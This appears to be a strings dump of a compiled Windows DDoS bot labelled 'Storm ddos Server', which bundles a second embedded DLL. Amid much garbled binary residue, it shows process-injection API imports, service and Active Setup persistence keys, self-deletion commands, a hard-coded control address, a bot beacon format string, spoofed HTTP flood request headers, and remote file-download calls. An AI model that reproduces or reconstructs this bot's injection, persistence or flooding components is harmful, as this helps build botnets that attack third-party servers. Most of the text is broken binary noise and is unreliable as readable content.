L!This program cannot be run in DOS mode.
`.rdata
@.data
SVD$\WP]
VWh|C@
D$TSUVWh
3|$$\$
L$ D$$D
D$ RPj
P_^]3[`
QR; @@
jeQD$(
d$ P$<
PQRhC@
L$lPQ\$
PD$pPj
r 3+t$L|$LhC@
3RQPPPPP$
PRPD$@D
D$HD$DD$L|$lfD$rD$tf|$p
PQB @@
jeQD$$
UV5d1@
3|$1D$0
T$0QL$ D$
t<L$ D$ (A@
QR3IQPQ
uChlD@
tBT$ D$
SUVWL$$D$(
YHUjh1@
hSVWe3
EPEPEP
0u>"u:Fu
<"u>"u
> vFuj
YY3%0@
{2EFAE6B9-5BBF-44d1-896E-0516FE2A7BD6}
GetSystemDirectoryA
GetSystemWindowsDirectoryA
CreateRemoteThread
GetProcAddress
GetModuleHandleA
WriteProcessMemory
VirtualAllocEx
lstrlenA
CreateProcessA
GetStartupInfoA
ResumeThread
SetThreadPriority
GetCurrentThread
SetPriorityClass
GetCurrentProcess
lstrcatA
lstrcpyA
GetEnvironmentVariableA
GetShortPathNameA
GetModuleFileNameA
GetLastError
SetFileAttributesA
CopyFileA
CloseHandle
WriteFile
CreateFileA
GlobalFree
LockResource
GlobalAlloc
LoadResource
SizeofResource
FindResourceA
KERNEL32.dll
MessageBoxA
USER32.dll
GetFileTitleA
comdlg32.dll
RegCloseKey
RegSetValueExA
RegDeleteValueA
RegOpenKeyA
SetServiceStatus
RegisterServiceCtrlHandlerA
RegCreateKeyA
StartServiceCtrlDispatcherA
RegQueryValueExA
RegOpenKeyExA
CloseServiceHandle
StartServiceA
OpenServiceA
CreateServiceA
OpenSCManagerA
ADVAPI32.dll
CoUninitialize
CoCreateGuid
CoInitialize
ole32.dll
MFC42.DLL
__CxxFrameHandler
_snprintf
fwrite
fclose
malloc
strstr
strncmp
_except_handler3
MSVCRT.dll
__dllonexit
_onexit
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
MSVCP60.dll
StormServer.dll
Storm ddos Server
Welcome to use storm ddos
Thank you
Program Files\Internet Explorer
calc.exe
notepad.exe
iexplore.exe
Kernel32
LoadLibraryA
ServiceDLL
SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
%SystemRoot%\System32\
> nul
/c del
COMSPEC
{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}
stubpath
SOFTWARE\Microsoft\Active Setup\Installed Components\
Description
SYSTEM\CurrentControlSet\Services\
L!This program cannot be run in DOS mode.
N\;&J\
N\Rich
@.reloc
192.168.1.2
Storm ddos DNS
Welcome to use storm ddos
Thank you
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
STORM:%d|%s|%s|%s|%s
GlobalMemoryStatusEx
kernel32.dll
~%u MHz
HARDWARE\DESCRIPTION\System\CentralProcessor\0
WinVista
Win2K3
%%%c%c%%%c%c
setsockopt Error!
%d.%d.%d.%d
i..c5.Ffp.36U
192.168.1.244
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1
Content-Type: text/html
Host:
Accept: text/html, */*
User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)
Referer: http://
:80/http://
Connection: Close
Cache-Control: no-cache
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/8.0
>CLICK OPEN PAGE
Connection: Keep-Alive
Cookie:
expires
HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Host:
User-Agent:Mozilla/4.0 (compatible; MSIE 7.00; Windows NT 5.1; MyIE 3.01)
xq1986
Cache-Control: no-cache
Referer: http://www.google.com
iexplore.exe
SeShutdownPrivilege
log off
ServiceDLL
SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
%SystemRoot%\System32\srvsvc.dll
stubpath
Software\Microsoft\Active Setup\Installed Components\
URLDownloadToFileA
wininet.dll
urlmon.dll
gethostbyname
WSOCK32.DLL
Strom attack
PEPEPWh
P|UEUj
WQRPcT
(VW3}j
OuT~Pj
YEARhp
OuuMu)P
EEPfE3h
fEfEEE
fEfEPfu
3f!EEf5
RYfEEYj
_^[USVW}
~%SSSh"
SSShq"
SS_^[]U
3f!Euh
RxYfEEYj
_^[USVW}
~%SSSh"
SSShq"
SS_^[]U
_^USVW}
~%SSSh(
SSShq"
SS_^[]U
_[USVW}
~%SSSh+*
SSShq"
SS_^[]U
_^[USVW}
~%SSSh+
SSShq"
SS_^[]U
_^[USVW}
~%SSSh]-
SSShq"
SS_^[]U VW
PVuEPW
_^USVW}
~%SSSh.
SSShq"
SS_^[]UX
3f[3}SVVh
j(EEEf]
]EP ]fEEj
_^[USVW}
~%SSSh0
SSShq"
SS_^[]UX
3f[3}SVVh
j(EEEf]
]fEEj
_^[USVW}
~%SSSh3
SSShq"
SS_^[]U\
3f[3}SVVh
j(EEEf]
_^[USVW}
~%SSSh6
SSShq"
SS_^[]U
IIII\=
_^[USVW}
~%SSShQ:
SSShq"
SS_^[]U
_USVW}
~%SSSh
SSShq"
SS_^[]U
_USVW}
~%SSSh=
SSShq"
SS_^[]U
EP%YYPEh
EP:YYPEh
EPYYPEh
EPwYYPEh
3SSShOK
3PPPhOK
@MPEPG$
EPYYPEVPE
@MPEPJ"
EPYYPEVPE
PEPE$!
EPYYPEh
~%SSSh?
SSShq"
~%SSSh'C
SSShq"
~%SSShA
SSShq"
SS_^[]
~%SSShI
SSShq"
~%SSSh>E
SSShq"
~%SSSh;G
SSShq"
QSUVWt$
3D$(|$,
3PPPhOK
RRRhOK
L$(D$(
RRRhq"
~%SSShQ
SSShq"
jA3Y3]=
9]wV5D
_^[UVWjA
~%VVVh^
VVVhq"
^USVW}
~%SSSh@`
|SSShq"
SS_^[]U
~%SSSha
SSShq"
SS_^[]U
Y3Ij@Y
t<EVP3h
VVEVPVuE
t<EVP3h
VVEVPVuE
t<EVP3h
VVEVPVuE
EPPEPWh
Y}3}fEPh@
Ej#P3j
SVWj@fE3Y3j@fY3f}
3Y}EED
PEPSSj SSSSP
SV@WPh
}u)V;t"
ESM@@PS
33VVVPC
HtKHt9Ht,Ht
u?PPl
u?PQPB
tqHtdHt
PPPP)S
ea[S9SYOu
YHYu@D$
YY=u9d
u7WPSt
u&WVSu
MMMMME
MdM\MTMLMDM<M4M,M$M
MMMMMMMMMMM{
MM|MtMlMdM\MTMLMDM<M4M,M$M
MMMMMMMMMMMMM|
MM|MtMlMdM\MTMLMDM<M4M,M$M
MMMMMMMMMM
MMMMM|MtMlMdM\MTMLMDM<M4M,M$M
MMMMMMMMMMMMMM~
MMxMpMhM`MXMPMHM@M8
MFC42.DLL
__CxxFrameHandler
printf
strstr
sprintf
strtok
malloc
MSVCRT.dll
__dllonexit
_onexit
_initterm
_adjust_fdiv
GetProcAddress
LoadLibraryA
lstrcpyA
GetVersionExA
GetSystemDefaultUILanguage
ExitThread
CreateThread
GetTickCount
OutputDebugStringA
GetCurrentProcess
SetFileAttributesA
GetModuleFileNameA
DeleteFileA
CreateProcessA
GetSystemDirectoryA
ExitProcess
GetLastError
CreateMutexA
KERNEL32.dll
wsprintfA
MessageBoxA
ExitWindowsEx
USER32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
DeleteService
OpenServiceA
OpenSCManagerA
RegSetValueExA
RegDeleteValueA
RegOpenKeyA
RegDeleteKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
WSASocketA
WS2_32.dll
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
InternetOpenA
WININET.dll
DLL.dll
HrCg@b
111w;;;;;
<N<<<<;=E=c=========
>S>>>>>>>F???????
1K111Z2r2
222222222
3L3_3d3m3v3|333333384?4E4K4d4~444444444
5+525B5G5^5n55555555555
636:6B6_6u666666
7@7J7R7[7h7n7t77777777
8(8.848B8H8R8\8c8m8{8888888
969?9E9K9V9h9x9999999999
:G:h:q:x:::::::::
;,;B;W;a;f;n;t;~;;;;;;;;;;;
<<%<A<L<R<[<n<~<<<<<<
=#=-=4=>=F=P=n=u=}========
>>(>;>K>r>>>>>>>>>>>>>
?-?6?=?N?j?p?????????
0 0*0/070=0G0Q0X0b0j0t0000000-13181J1c11112222222
3&383B3H3R3\3c3m3u3
333333
484>4C4U4n44445555555
626D6N6T6^6h6o6y66666666
7D7I7Z7`7y77777&8<8k8r888a9p9v9|9999999
:!:(:2:::D:i:{::::::
;$;0;E;U;|;;;;;;;;;;;;; <(</<7<h<u<z<<<<<<<<<<
=;=Q=f=p=u={===========
>/>:>C>I>O>[>l>|>>>>>>>>>>
?6?S?e?v???????????
0'0F1O1T1m1t1|1111111111
3#3(3V3s3x333333334
5!5(505:5?5m5555555555566
7"7-777<7o7777777777
8/8R9d9i99999999
;2;9;A;K;P;k;t;y;~;;;;a<f<
<<<<<<<<
==-=5=;=F=c=}======
>!>=>C>H>M>R>W>d>???
0;0A0F0K0P0U011111
22$2>2E2M2S2X2]2h22=3J3O3x3333333
4-4B4L4Q4Y4_4i4s4z4444444.5:5@5M5S5z5555555555555
6/6;6K6r66666666666666(7D7s7
777777777
8#8*848<8F8j8888888
9*979H9]9g9l9t9z999999999
:I:X:]:e:k:x:~::::::::::
;";,;Y;d;j;r;|;;;;;;;;
<3<H<T<b<~<<<<<<<<
=)=7=?=F=o=======
>$>9>C>H>P>V>`>j>q>{>>>>>>>
?C?J?c?s???????????
0"0*040A0Y0g0p0u000000000
1#151=1`1j1p1z111111111
292B2H2M2W2b2o2
22222222
3!3+333=33344444444#5(50585D5W5^5n5u555555555
66/666U6^6p66666666
7767A7F7P7e7n7x7777777728]8b8x88888
9$989C9M9X9i9u9999999999
:%:+:;:::::
_1g1m1x1}1111111111111111
2 2&2,22282>2D2J2
3y33333333333333
4/4A44444
5d55E66E77-8I99999
:1:M:a:u::::::::
;$;,;4;<;D;P;l;t;|;;;;;;;;;;;;;;
<$<,<4<<<D<L<X<t<|<<<<<<<<<<<<<<<
=$=,=4=<=D=L=T=\=d=l=t===============
>4><>D>L>T>\>d>l>t>|>>>>>>>>>>>>>>
?$?,?4?<?D?L?T?\?d?l?t?|??????????????
0$000L0T0`0|000000000
1 1<1D1P1l1x11111
V S _ V E R S I O N _ I N F O
S t r i n g F i l e I n f o
0 8 0 4 0 4 b 0
C o m m e n t s
C o m p a n y N a m e
F i l e D e s c r i p t i o n
S t o r m D D O S S e r v e r
F i l e V e r s i o n
I n t e r n a l N a m e
S t o r m S e r D L L
L e g a l C o p y r i g h t
( C ) 2 0 0 9
L e g a l T r a d e m a r k s
O r i g i n a l F i l e n a m e
S t o r m S e r D L L
P r i v a t e B u i l d
P r o d u c t N a m e
S t o r m S e r D L L
P r o d u c t V e r s i o n
S p e c i a l B u i l d
V a r F i l e I n f o
T r a n s l a t i o n